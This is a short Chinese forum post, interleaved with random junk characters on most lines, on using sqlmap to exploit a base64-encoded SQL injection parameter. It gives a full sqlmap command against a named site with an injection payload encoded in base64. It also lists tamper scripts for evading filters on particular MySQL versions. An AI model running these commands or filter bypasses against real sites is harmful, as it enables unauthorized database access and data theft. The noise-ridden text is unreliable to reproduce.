WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
+ l& ~3 D! L* S( N0 y1 I) u" f8 n. V* I( Q* y1 J5 i& \; ]' d
sqlmap的tamper里有个base64encode.py
& D5 n4 h9 F, s# l0 J/ X4 d$ p" @# k3 N p
使用如下+ a0 R# n$ g$ n) U; v Z' U
* y) h+ R: Z) p, g5 t* l3 Z1 r
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs' K, ] w1 \* Y& N' |, M! C8 x
( N. O0 A. b) e' P0 z. E8 B
' H6 q- h4 A; Ssqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
) U0 N4 V P0 i$ M) ~' u% ]+ R% E8 p9 B2 u1 V
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
@3 e7 ^8 z6 _
8 H0 t5 I! n3 m# f5 dspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入- Z* f# k5 N" M/ X. R8 y
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入- Q/ B: O4 K& G9 A+ J" Q
首先确定目标数据库版本,然后选择相应的脚本。
2 W# W4 P8 N) u1 Y3 G' w u-v 3 --batch --tamper "space2hash.py"
% Y5 ?6 X) Z. J
. k' `2 {6 i+ A/ v# Q还有其他一些插件:
# B. c- Q8 {% U# aencodes编码 ——charencode.py
! W H1 a" D$ ^2 Pbase64编码 —— base64encode.py# O- M/ z, C* ^7 C
替换空格和关键字 —— halfversionedmorekeywords.py3 e, ^! j# N! v
|
7 d9 i9 l9 t6 z0 C+ r- l6 v# F/ E, p) i
. t* U4 ^) G' m! |! N, y; s8 d2 E- Y$ V, \, E
|